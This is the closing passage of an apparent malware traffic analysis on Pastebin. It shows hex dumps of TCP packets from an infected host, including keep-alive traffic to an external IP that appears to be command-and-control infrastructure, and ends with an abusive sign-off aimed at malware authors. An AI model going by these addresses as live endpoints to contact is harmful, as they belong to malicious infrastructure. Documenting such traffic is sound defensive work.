  1246. 195.169.125.228 192.168.7.84 TCP 13606 > cma [RST, ACK] Seq=1 Ack=1 Win=0 Len=0
  1247.  
  1248. 0000 00 12 f0 e9 3e 3e 00 a0 c9 22 b0 ee 08 00 45 00 ....>>.. ."....E.
  1249. 0010 00 28 00 00 40 00 2e 06 43 46 c3 a9 7d e4 c0 a8 .(..@... CF..}...
  1250. 0020 07 54 35 26 04 1a 00 00 00 00 45 bf 07 2d 50 14 .T5&.... ..E..-P.
  1251. 0030 00 00 20 1a 00 00 7e 7e 7e 7e 7e 7e .. ...~~ ~~~~
  1252.  
  1253. 192.168.7.84 195.169.125.228 TCP cma > 13606 [SYN] Seq=0 Win=16384 Len=0 MSS=1460 SACK_PERM=1
  1254.  
  1255. 0000 00 a0 c9 22 b0 ee 00 12 f0 e9 3e 3e 08 00 45 00 ...".... ..>>..E.
  1256. 0010 00 30 26 64 40 00 80 06 ca d9 c0 a8 07 54 c3 a9 .0&d@... .....T..
  1257. 0020 7d e4 04 1a 35 26 45 bf 07 2c 00 00 00 00 70 02 }...5&E. .,....p.
  1258. 0030 40 00 b3 69 00 00 02 04 05 b4 01 01 04 02 @..i.... ......
  1259.  
  1260.  
  1261. 8) KEEP ALIVE DATA SENT TO 70.138.242.12
  1262.  
  1263. 192.168.7.84 70.138.242.12 TCP optima-vnet > 21913 [SYN] Seq=0 Win=16384 Len=0 MSS=1460 SACK_PERM=1
  1264.  
  1265. 0000 00 a0 c9 22 b0 ee 00 12 f0 e9 3e 3e 08 00 45 00 ...".... ..>>..E.
  1266. 0010 00 30 26 67 40 00 80 06 d3 cd c0 a8 07 54 46 8a .0&g@... .....TF.
  1267. 0020 f2 0c 04 1b 55 99 0f 73 e2 af 00 00 00 00 70 02 ....U..s ......p.
  1268. 0030 40 00 f6 b4 00 00 02 04 05 b4 01 01 04 02 @....... ......
  1269.  
  1270. 0000 00 a0 c9 22 b0 ee 00 12 f0 e9 3e 3e 08 00 45 00 ...".... ..>>..E.
  1271. 0010 00 30 26 7f 40 00 80 06 d3 b5 c0 a8 07 54 46 8a .0&.@... .....TF.
  1272. 0020 f2 0c 04 1b 55 99 0f 73 e2 af 00 00 00 00 70 02 ....U..s ......p.
  1273. 0030 40 00 f6 b4 00 00 02 04 05 b4 01 01 04 02 @....... ......
  1274.  
  1275.  
  1276. -------
  1277. #MalwareMustDie!!! Crusaders Rocks!!
  1278. Hope the malware morons, yeah, you! Choke to death after reading this & go straight to hell!!!!
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!